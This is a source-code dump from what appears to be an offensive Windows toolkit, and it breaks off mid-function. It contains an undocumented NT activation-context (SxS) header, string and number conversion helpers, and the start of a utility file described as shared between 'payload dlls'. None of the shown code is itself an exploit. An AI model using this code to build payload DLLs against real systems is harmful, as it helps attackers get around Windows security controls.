* (C) COPYRIGHT AUTHORS, 2017 - 2023, translated from Microsoft sources/debugger
*
* TITLE: NTSXS.H
*
* VERSION: 1.05
*
* DATE: 24 Jun 2023
*
* Common header file for the SxS related API functions and definitions.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
************************************************************************************/
#ifndef NTSXS_RTL
#define NTSXS_RTL
//
// NTSXS_RTL HEADER BEGIN
//
#if defined(__cplusplus)
extern "C" {
#endif
#pragma warning(push)
#pragma warning(disable: 4214) // nonstandard extension used : bit field types other than int
#define ACTCTX_PROCESS_DEFAULT ((void*)NULL)
#define ACTCTX_EMPTY ((void*)(LONG_PTR)-3)
#define ACTCTX_SYSTEM_DEFAULT ((void*)(LONG_PTR)-4)
#define IS_SPECIAL_ACTCTX(x) (((((LONG_PTR)(x)) - 1) | 7) == -1)
typedef struct _ACTIVATION_CONTEXT *PACTIVATION_CONTEXT;
typedef const struct _ACTIVATION_CONTEXT *PCACTIVATION_CONTEXT;
#define INVALID_ACTIVATION_CONTEXT ((PACTIVATION_CONTEXT) ((LONG_PTR) -1))
#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_USE_ACTIVE_ACTIVATION_CONTEXT (0x00000001)
#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_ACTIVATION_CONTEXT_IS_MODULE (0x00000002)
#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_ACTIVATION_CONTEXT_IS_ADDRESS (0x00000004)
#define RTL_QUERY_INFORMATION_ACTIVATION_CONTEXT_FLAG_NO_ADDREF (0x80000000)
#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_ACTIVATION_CONTEXT (0x00000001)
#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_FLAGS (0x00000002)
#define FIND_ACTIVATION_CONTEXT_SECTION_KEY_RETURN_ASSEMBLY_METADATA (0x00000004)
#define ACTIVATION_CONTEXT_SECTION_FORMAT_UNKNOWN 0
#define ACTIVATION_CONTEXT_SECTION_FORMAT_STRING 1
#define ACTIVATION_CONTEXT_SECTION_FORMAT_GUID 2
#define ACTIVATION_CONTEXT_DATA_MAGIC 0x78746341 //'xtcA'
#define ACTIVATION_CONTEXT_STRING_SECTION_MAGIC 0x64487353 //'dHsS'
#define ACTIVATION_CONTEXT_GUID_SECTION_MAGIC 0x64487347 //'dHsG'
typedef struct _ACTIVATION_CONTEXT_DATA_TOC_HEADER {
ULONG HeaderSize;
ULONG EntryCount;
ULONG FirstEntryOffset;
ULONG Flags;
} ACTIVATION_CONTEXT_DATA_TOC_HEADER, *PACTIVATION_CONTEXT_DATA_TOC_HEADER;
typedef struct _ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER {
ULONG HeaderSize;
ULONG EntryCount;
ULONG FirstEntryOffset;
ULONG Flags;
} ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER, *PACTIVATION_CONTEXT_DATA_EXTENDED_TOC_HEADER;
typedef struct _ACTIVATION_CONTEXT_DATA_TOC_ENTRY {
ULONG Id; //type of section
ULONG Offset;
ULONG Length;
ULONG Format; //ACTIVATION_CONTEXT_SECTION_FORMAT_*
} ACTIVATION_CONTEXT_DATA_TOC_ENTRY, *PACTIVATION_CONTEXT_DATA_TOC_ENTRY;
typedef struct _ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY {
GUID ExtensionGuid;
ULONG Offset;
ULONG Length;
} ACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY, *PACTIVATION_CONTEXT_DATA_EXTENDED_TOC_ENTRY;
typedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HEADER {
ULONG Magic;
ULONG HeaderSize;
ULONG FormatVersion;
ULONG DataFormatVersion;
ULONG Flags;
ULONG ElementCount;
ULONG ElementListOffset;
ULONG HashAlgorithm;
ULONG SearchStructureOffset;
ULONG UserDataOffset;
ULONG UserDataSize;
} ACTIVATION_CONTEXT_STRING_SECTION_HEADER, *PACTIVATION_CONTEXT_STRING_SECTION_HEADER;
#define ACTIVATION_CONTEXT_STRING_SECTION_CASE_INSENSITIVE (0x00000001)
#define ACTIVATION_CONTEXT_STRING_SECTION_ENTRIES_IN_PSEUDOKEY_ORDER (0x00000002)
typedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE {
ULONG BucketTableEntryCount;
ULONG BucketTableOffset;
} ACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE, *PACTIVATION_CONTEXT_STRING_SECTION_HASH_TABLE;
typedef struct _ACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET {
ULONG ChainCount;
ULONG ChainOffset;
} ACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET, *PACTIVATION_CONTEXT_STRING_SECTION_HASH_BUCKET;
typedef struct _ACTIVATION_CONTEXT_STRING_SECTION_ENTRY {
ULONG PseudoKey;
ULONG KeyOffset;
ULONG KeyLength;
ULONG Offset;
ULONG Length;
ULONG AssemblyRosterIndex;
} ACTIVATION_CONTEXT_STRING_SECTION_ENTRY, *PACTIVATION_CONTEXT_STRING_SECTION_ENTRY;
typedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HEADER {
ULONG Magic;
ULONG HeaderSize;
ULONG FormatVersion;
ULONG DataFormatVersion;
ULONG Flags;
ULONG ElementCount;
ULONG ElementListOffset;
ULONG HashAlgorithm;
ULONG SearchStructureOffset;
ULONG UserDataOffset;
ULONG UserDataSize;
} ACTIVATION_CONTEXT_GUID_SECTION_HEADER, PACTIVATION_CONTEXT_GUID_SECTION_HEADER;
typedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE {
ULONG BucketTableEntryCount;
ULONG BucketTableOffset;
} ACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE, *PACTIVATION_CONTEXT_GUID_SECTION_HASH_TABLE;
typedef struct _ACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET {
ULONG ChainCount;
ULONG ChainOffset;
} ACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET, *PACTIVATION_CONTEXT_GUID_SECTION_HASH_BUCKET;
typedef struct _ACTIVATION_CONTEXT_GUID_SECTION_ENTRY {
GUID Guid;
ULONG Offset;
ULONG Length;
ULONG AssemblyRosterIndex;
} ACTIVATION_CONTEXT_GUID_SECTION_ENTRY, *PACTIVATION_CONTEXT_GUID_SECTION_ENTRY;
typedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION {
ULONG Size;
ULONG Flags;
GUID PolicyCoherencyGuid;
GUID PolicyOverrideGuid;
ULONG ApplicationDirectoryPathType;
ULONG ApplicationDirectoryLength;
ULONG ApplicationDirectoryOffset;
ULONG ResourceName;
} ACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_GLOBAL_INFORMATION;
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ROOT_ASSEMBLY (0x00000001)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_POLICY_APPLIED (0x00000002)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ASSEMBLY_POLICY_APPLIED (0x00000004)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_ROOT_POLICY_APPLIED (0x00000008)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION_PRIVATE_ASSEMBLY (0x00000010)
#pragma pack(push,1)
typedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION {
ULONG Size;
ULONG Flags;
ULONG EncodedAssemblyIdentityLength;
ULONG EncodedAssemblyIdentityOffset;
ULONG ManifestPathType;
ULONG ManifestPathLength;
ULONG ManifestPathOffset;
LARGE_INTEGER ManifestLastWriteTime;
ULONG PolicyPathType;
ULONG PolicyPathLength;
ULONG PolicyPathOffset;
LARGE_INTEGER PolicyLastWriteTime;
ULONG MetadataSatelliteRosterIndex;
ULONG Unused2;
ULONG ManifestVersionMajor;
ULONG ManifestVersionMinor;
ULONG PolicyVersionMajor;
ULONG PolicyVersionMinor;
ULONG AssemblyDirectoryNameLength;
ULONG AssemblyDirectoryNameOffset;
ULONG NumOfFilesInAssembly;
ULONG LanguageLength;
ULONG LanguageOffset;
ACTCTX_REQUESTED_RUN_LEVEL RunLevel;
ULONG UiAccess;
} ACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_INFORMATION;
#pragma pack(pop)
#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_INCLUDES_BASE_NAME (0x00000001)
#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_OMITS_ASSEMBLY_ROOT (0x00000002)
#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_EXPAND (0x00000004)
#define ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SYSTEM_DEFAULT_REDIRECTED_SYSTEM32_DLL (0x00000008)
typedef struct _ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION {
ULONG Size;
ULONG Flags;
ULONG TotalPathLength;
ULONG PathSegmentCount;
ULONG PathSegmentOffset;
} ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION, *PACTIVATION_CONTEXT_DATA_DLL_REDIRECTION;
typedef struct _ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT {
ULONG Length;
ULONG Offset;
} ACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT, *PACTIVATION_CONTEXT_DATA_DLL_REDIRECTION_PATH_SEGMENT;
typedef struct _ACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION {
ULONG Size;
ULONG Flags;
ULONG VersionSpecificClassNameLength;
ULONG VersionSpecificClassNameOffset;
ULONG DllNameLength;
ULONG DllNameOffset;
} ACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION, *PACTIVATION_CONTEXT_DATA_WINDOW_CLASS_REDIRECTION;
#define ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS_FORMAT_LONGHORN (1)
#define SXS_WINDOWS_SETTINGS_NAMESPACE L"http://schemas.microsoft.com/SMI/2005/WindowsSettings"
#define SXS_WINDOWS_SETTINGS_NAMESPACE_CCH (53)
#define SXS_WINDOWS_SETTINGS_2011_NAMESPACE L"http://schemas.microsoft.com/SMI/2011/WindowsSettings"
#define SXS_WINDOWS_SETTINGS_2011_NAMESPACE_CCH (53)
#define SXS_WINDOWS_SETTINGS_2013_NAMESPACE L"http://schemas.microsoft.com/SMI/2013/WindowsSettings"
#define SXS_WINDOWS_SETTINGS_2013_NAMESPACE_CCH (53)
#define SXS_WINDOWS_SETTINGS_2014_NAMESPACE L"http://schemas.microsoft.com/SMI/2014/WindowsSettings"
#define SXS_WINDOWS_SETTINGS_2014_NAMESPACE_CCH (53)
#define SXS_WINDOWS_SETTINGS_2016_NAMESPACE L"http://schemas.microsoft.com/SMI/2016/WindowsSettings"
#define SXS_WINDOWS_SETTINGS_2016_NAMESPACE_CCH (53)
#define SXS_WINDOWS_SETTINGS_2017_NAMESPACE L"http://schemas.microsoft.com/SMI/2017/WindowsSettings"
#define SXS_WINDOWS_SETTINGS_2017_NAMESPACE_CCH (53)
typedef struct _ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS {
ULONG Size;
ULONG Flags;
ULONG SettingNamespaceLength;
ULONG SettingNamespaceOffset;
ULONG SettingNameLength;
ULONG SettingNameOffset;
ULONG SettingValueLength;
ULONG SettingValueOffset;
} ACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS, *PACTIVATION_CONTEXT_DATA_APPLICATION_SETTINGS;
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_FORMAT_WHISTLER (1)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_INVALID (0)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_APARTMENT (1)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_FREE (2)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_SINGLE (3)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_BOTH (4)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_THREADING_MODEL_NEUTRAL (5)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET (8)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_DEFAULT (0x01 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_ICON (0x02 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_CONTENT (0x04 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_THUMBNAIL (0x08 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_HAS_DOCPRINT (0x10 << ACTIVATION_CONTEXT_DATA_COM_SERVER_MISCSTATUS_FLAG_OFFSET)
typedef struct _ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION {
ULONG Size;
ULONG Flags;
ULONG ThreadingModel;
GUID ReferenceClsid;
GUID ConfiguredClsid;
GUID ImplementedClsid;
GUID TypeLibraryId;
ULONG ModuleLength;
ULONG ModuleOffset;
ULONG ProgIdLength;
ULONG ProgIdOffset;
ULONG ShimDataLength;
ULONG ShimDataOffset;
ULONG MiscStatusDefault;
ULONG MiscStatusContent;
ULONG MiscStatusThumbnail;
ULONG MiscStatusIcon;
ULONG MiscStatusDocPrint;
} ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION;
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM_TYPE_OTHER (1)
#define ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM_TYPE_CLR_CLASS (2)
typedef struct _ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM {
ULONG Size;
ULONG Flags;
ULONG Type;
ULONG ModuleLength;
ULONG ModuleOffset;
ULONG TypeLength;
ULONG TypeOffset;
ULONG ShimVersionLength;
ULONG ShimVersionOffset;
ULONG DataLength;
ULONG DataOffset;
} ACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM, *PACTIVATION_CONTEXT_DATA_COM_SERVER_REDIRECTION_SHIM;
typedef struct _ACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION {
ULONG Size;
ULONG Flags;
ULONG NameLength;
ULONG NameOffset;
USHORT ResourceId;
USHORT LibraryFlags;
ULONG HelpDirLength;
ULONG HelpDirOffset;
} ACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_TYPE_LIBRARY_REDIRECTION;
typedef struct _ACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION {
ULONG Size;
ULONG Flags;
ULONG ConfiguredClsidOffset;
} ACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION, *PACTIVATION_CONTEXT_DATA_COM_PROGID_REDIRECTION;
typedef struct _SXS_OVERRIDE_MANIFEST {
PCWSTR Name;
PVOID Address;
SIZE_T Size;
} SXS_OVERRIDE_MANIFEST, *PSXS_OVERRIDE_MANIFEST;
typedef struct _SXS_MANIFEST_STREAM {
const IID* IIDStream;
PVOID OutIStream;
}SXS_MANIFEST_STREAM, *PSXS_MANIFEST_STREAM;
typedef struct _ACTIVATION_CONTEXT_ASSEMBLY_DATA {
ULONG Size;
ULONG Flags;
WCHAR *AssemblyName;
ULONG AssemblyNameLength;
ULONG HashAlgorithm;
ULONG PseudoKey;
} ACTIVATION_CONTEXT_ASSEMBLY_DATA, *PACTIVATION_CONTEXT_ASSEMBLY_DATA;
typedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER {
ULONG HeaderSize;
ULONG HashAlgorithm;
ULONG EntryCount;
ULONG FirstEntryOffset;
ULONG AssemblyInformationSectionOffset;
} ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_HEADER;
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY_INVALID (0x00000001)
#define ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY_ROOT (0x00000002)
typedef struct _ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY {
ULONG Flags;
ULONG PseudoKey;
ULONG AssemblyNameOffset;
ULONG AssemblyNameLength;
ULONG AssemblyInformationOffset;
ULONG AssemblyInformationLength;
} ACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY, *PACTIVATION_CONTEXT_DATA_ASSEMBLY_ROSTER_ENTRY;
typedef struct _ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA {
PVOID Information;
PVOID SectionBase;
ULONG SectionLength;
PVOID SectionGlobalDataBase;
ULONG SectionGlobalDataLength;
} ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA, *PACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA;
typedef struct _ACTIVATION_CONTEXT_SECTION_KEYED_DATA {
ULONG Size;
ULONG DataFormatVersion;
PVOID Data;
ULONG Length;
PVOID SectionGlobalData;
ULONG SectionGlobalDataLength;
PVOID SectionBase;
ULONG SectionTotalLength;
PACTIVATION_CONTEXT ActivationContext;
ULONG AssemblyRosterIndex;
ULONG Flags;
ACTIVATION_CONTEXT_SECTION_KEYED_DATA_ASSEMBLY_METADATA AssemblyMetadata;
} ACTIVATION_CONTEXT_SECTION_KEYED_DATA, *PACTIVATION_CONTEXT_SECTION_KEYED_DATA;
#define RTL_ACTIVATE_ACTIVATION_CONTEXT_EX_FLAG_RELEASE_ON_STACK_DEALLOCATION (0x00000001)
NTSYSAPI
NTSTATUS
NTAPI
RtlActivateActivationContextEx(
_In_ ULONG Flags,
_In_ PTEB Teb,
_In_ PACTIVATION_CONTEXT ActivationContext,
_Out_ PULONG_PTR Cookie);
NTSYSAPI
NTSTATUS
NTAPI
RtlQueryInformationActivationContext(
_In_ ULONG Flags,
_In_ PCACTIVATION_CONTEXT ActivationContext,
_In_opt_ PVOID SubInstanceIndex,
_In_ ACTIVATION_CONTEXT_INFO_CLASS ActivationContextInformationClass,
_Out_ PVOID ActivationContextInformation,
_In_ SIZE_T ActivationContextInformationLength,
_Out_opt_ PSIZE_T ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlQueryInformationActiveActivationContext(
_In_ ACTIVATION_CONTEXT_INFO_CLASS ActivationContextInformationClass,
_Out_ PVOID ActivationContextInformation,
_In_ SIZE_T ActivationContextInformationLength,
_Out_opt_ PSIZE_T ReturnLength);
NTSYSAPI
NTSTATUS
NTAPI
RtlAllocateActivationContextStack(
_Inout_ PACTIVATION_CONTEXT_STACK *ActivationContextStackPointer);
NTSYSAPI
VOID
NTAPI
RtlFreeActivationContextStack(
_In_ PACTIVATION_CONTEXT_STACK ActivationContextStackPointer);
NTSYSAPI
NTSTATUS
NTAPI
RtlCreateActivationContext(
_In_ ULONG Flags,
_In_ const PACTIVATION_CONTEXT_DATA ActivationContextData,
_In_opt_ ULONG ExtraBytes,
_In_opt_ PACTIVATION_CONTEXT_NOTIFY_ROUTINE NotificationRoutine,
_In_opt_ PVOID NotificationContext,
_Out_ PACTIVATION_CONTEXT *ActivationContext);
NTSYSAPI
VOID
NTAPI
RtlAddRefActivationContext(
_In_ PACTIVATION_CONTEXT AppCtx);
NTSYSAPI
VOID
NTAPI
RtlReleaseActivationContext(
_In_ PACTIVATION_CONTEXT AppCtx);
NTSYSAPI
NTSTATUS
NTAPI
RtlZombifyActivationContext(
_In_ PACTIVATION_CONTEXT ActivationContext);
NTSYSAPI
NTSTATUS
NTAPI
RtlGetActiveActivationContext(
_Out_ PACTIVATION_CONTEXT *ActivationContext);
NTSYSAPI
BOOLEAN
NTAPI
RtlIsActivationContextActive(
_In_ PACTIVATION_CONTEXT ActivationContext);
NTSYSAPI
NTSTATUS
NTAPI
RtlQueryActivationContextApplicationSettings(
_In_opt_ DWORD dwFlags,
_In_opt_ HANDLE hActCtx,
_In_opt_ PCWSTR settingsNameSpace,
_In_ PCWSTR settingName,
_Out_writes_bytes_to_opt_(dwBuffer, *pdwWrittenOrRequired) PWSTR pvBuffer,
_In_ SIZE_T dwBuffer,
_Out_opt_ SIZE_T *pdwWrittenOrRequired);
NTSYSAPI
NTSTATUS
NTAPI
RtlFindActivationContextSectionString(
_In_ ULONG Flags,
_In_opt_ CONST GUID *ExtensionGuid,
_In_ ULONG SectionId,
_In_ PCUNICODE_STRING StringToFind,
_Inout_ PACTIVATION_CONTEXT_SECTION_KEYED_DATA ReturnedData);
//
// NTSXS_RTL HEADER END
//
#pragma warning(pop)
#ifdef __cplusplus
}
#endif
#endif NTSXS_RTL
================================================
FILE: Source/Shared/rtltypes.h
================================================
#pragma once
#ifndef _WCHAR_T_DEFINED
typedef unsigned short wchar_t;
#define _WCHAR_T_DEFINED
#endif /* _WCHAR_T_DEFINED */
#ifndef _SIZE_T_DEFINED
#ifdef _WIN64
typedef unsigned __int64 size_t;
#else /* _WIN64 */
typedef __w64 unsigned int size_t;
#endif /* _WIN64 */
#define _SIZE_T_DEFINED
#endif /* _SIZE_T_DEFINED */
__forceinline char locase_a(char c)
{
if ((c >= 'A') && (c <= 'Z'))
return c + 0x20;
else
return c;
}
__forceinline wchar_t locase_w(wchar_t c)
{
if ((c >= 'A') && (c <= 'Z'))
return c + 0x20;
else
return c;
}
__forceinline char byteabs(char x) {
if (x < 0)
return -x;
return x;
}
__forceinline int _isdigit_a(char x) {
return ((x >= '0') && (x <= '9'));
}
__forceinline int _isdigit_w(wchar_t x) {
return ((x >= L'0') && (x <= L'9'));
}
================================================
FILE: Source/Shared/shared.h
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2018 - 2021
*
* TITLE: SHARED.H
*
* VERSION: 3.56
*
* DATE: 26 July 2021
*
* Shared include header file.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#pragma once
//disable nonmeaningful warnings.
#pragma warning(push)
#pragma warning(disable: 4005) // macro redefinition
#pragma warning(disable: 4055) // %s : from data pointer %s to function pointer %s
#pragma warning(disable: 4201) // nonstandard extension used : nameless struct/union
#include
#include
#include "ntos\ntos.h"
#include "ntos\ntbuilds.h"
#define _NTDEF_
#include
#undef _NTDEF_
#include "minirtl.h"
#include "_filename.h"
#include "util.h"
#include "windefend.h"
#include "consts.h"
#if defined(__cplusplus)
#include
#endif
#pragma warning(pop)
================================================
FILE: Source/Shared/strtoi.c
================================================
#include "rtltypes.h"
int strtoi_a(char *s)
{
int a = 0, sign;
char c;
if (s == 0)
return 0;
switch (*s) {
case '-':
s++;
sign = -1;
break;
case '+':
s++;
sign = 1;
break;
default:
sign = 1;
}
while (*s != 0) {
c = *s;
if (_isdigit_a(c))
a = (a*10) + (c-'0');
else
break;
s++;
}
return a*sign;
}
int strtoi_w(wchar_t *s)
{
int a = 0, sign;
wchar_t c;
if (s == 0)
return 0;
switch (*s) {
case L'-':
s++;
sign = -1;
break;
case L'+':
s++;
sign = 1;
break;
default:
sign = 1;
}
while (*s != 0) {
c = *s;
if (_isdigit_w(c))
a = (a*10)+(c-L'0');
else
break;
s++;
}
return a*sign;
}
================================================
FILE: Source/Shared/strtoul.c
================================================
#include "rtltypes.h"
unsigned long strtoul_a(char *s)
{
unsigned long a = 0;
char c;
if (s == 0)
return 0;
while (*s != 0) {
c = *s;
if (_isdigit_a(c))
a = (a*10)+(c-'0');
else
break;
s++;
}
return a;
}
unsigned long strtoul_w(wchar_t *s)
{
unsigned long a = 0;
wchar_t c;
if (s == 0)
return 0;
while (*s != 0) {
c = *s;
if (_isdigit_w(c))
a = (a*10)+(c-L'0');
else
break;
s++;
}
return a;
}
================================================
FILE: Source/Shared/u64tohex.c
================================================
#include "rtltypes.h"
size_t u64tohex_a(unsigned long long x, char *s)
{
char p;
size_t c;
if (s==0)
return 16;
for (c=0; c<16; c++) {
p = (char)(x & 0xf);
x >>= 4;
if (p<10)
p += '0';
else
p = 'A' + (p-10);
s[15-c] = p;
}
s[16] = 0;
return 16;
}
size_t u64tohex_w(unsigned long long x, wchar_t *s)
{
wchar_t p;
size_t c;
if (s==0)
return 16;
for (c = 0; c<16; c++) {
p = (wchar_t)(x & 0xf);
x >>= 4;
if (p<10)
p += L'0';
else
p = L'A' + (p-10);
s[15-c] = p;
}
s[16] = 0;
return 16;
}
================================================
FILE: Source/Shared/u64tostr.c
================================================
#include "rtltypes.h"
size_t u64tostr_a(unsigned long long x, char *s)
{
unsigned long long t = x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (char)(x % 10) + '0';
x /= 10;
}
s[r] = (char)0;
return r;
}
size_t u64tostr_w(unsigned long long x, wchar_t *s)
{
unsigned long long t = x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (wchar_t)(x % 10) + L'0';
x /= 10;
}
s[r] = (wchar_t)0;
return r;
}
================================================
FILE: Source/Shared/ultohex.c
================================================
#include "rtltypes.h"
size_t ultohex_a(unsigned long x, char *s)
{
char p;
size_t c;
if (s==0)
return 8;
for (c=0; c<8; c++) {
p = (char)(x & 0xf);
x >>= 4;
if (p<10)
p += '0';
else
p = 'A' + (p-10);
s[7-c] = p;
}
s[8] = 0;
return 8;
}
size_t ultohex_w(unsigned long x, wchar_t *s)
{
wchar_t p;
size_t c;
if (s==0)
return 8;
for (c=0; c<8; c++) {
p = (wchar_t)(x & 0xf);
x >>= 4;
if (p<10)
p += L'0';
else
p = L'A' + (p-10);
s[7-c] = p;
}
s[8] = 0;
return 8;
}
================================================
FILE: Source/Shared/ultostr.c
================================================
#include "rtltypes.h"
size_t ultostr_a(unsigned long x, char *s)
{
unsigned long t=x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (char)(x % 10) + '0';
x /= 10;
}
s[r] = (char)0;
return r;
}
size_t ultostr_w(unsigned long x, wchar_t *s)
{
unsigned long t=x;
size_t i, r=1;
while ( t >= 10 ) {
t /= 10;
r++;
}
if (s == 0)
return r;
for (i = r; i != 0; i--) {
s[i-1] = (wchar_t)(x % 10) + L'0';
x /= 10;
}
s[r] = (wchar_t)0;
return r;
}
================================================
FILE: Source/Shared/util.c
================================================
/*******************************************************************************
*
* (C) COPYRIGHT AUTHORS, 2017 - 2025
*
* TITLE: UTIL.C
*
* VERSION: 3.69
*
* DATE: 07 Jul 2025
*
* Global support routines file shared between payload dlls.
*
* THIS CODE AND INFORMATION IS PROVIDED "AS IS" WITHOUT WARRANTY OF
* ANY KIND, EITHER EXPRESSED OR IMPLIED, INCLUDING BUT NOT LIMITED
* TO THE IMPLIED WARRANTIES OF MERCHANTABILITY AND/OR FITNESS FOR A
* PARTICULAR PURPOSE.
*
*******************************************************************************/
#undef _TRACE_CALL
#include "shared.h"
/*
* ucmxHeapAlloc
*
* Purpose:
*
* Wrapper for RtlAllocateHeap.
*
*/
PVOID ucmxHeapAlloc(
_In_ SIZE_T NumberOfBytes
)
{
return RtlAllocateHeap(NtCurrentPeb()->ProcessHeap,
HEAP_ZERO_MEMORY,
NumberOfBytes);
}
/*
* ucmxHeapFree
*
* Purpose:
*
* Wrapper for RtlFreeHeap.
*
*/
BOOLEAN ucmxHeapFree(
_In_ PVOID BaseAddress
)
{
return RtlFreeHeap(NtCurrentPeb()->ProcessHeap,
0,
BaseAddress);
}
/*
* ucmIsProcess32bit
*
* Purpose:
*
* Return TRUE if given process is under WOW64, FALSE otherwise.
*
*/
BOOLEAN ucmIsProcess32bit(
_In_ HANDLE hProcess
)
{
NTSTATUS status;
PROCESS_EXTENDED_BASIC_INFORMATION pebi;
if (hProcess == NULL) {
return FALSE;
}
//query if this is wow64 process
RtlSecureZeroMemory(&pebi, sizeof(pebi));
pebi.Size = sizeof(PROCESS_EXTENDED_BASIC_INFORMATION);
status = NtQueryInformationProcess(hProcess, ProcessBasicInformation, &pebi, sizeof(pebi), NULL);
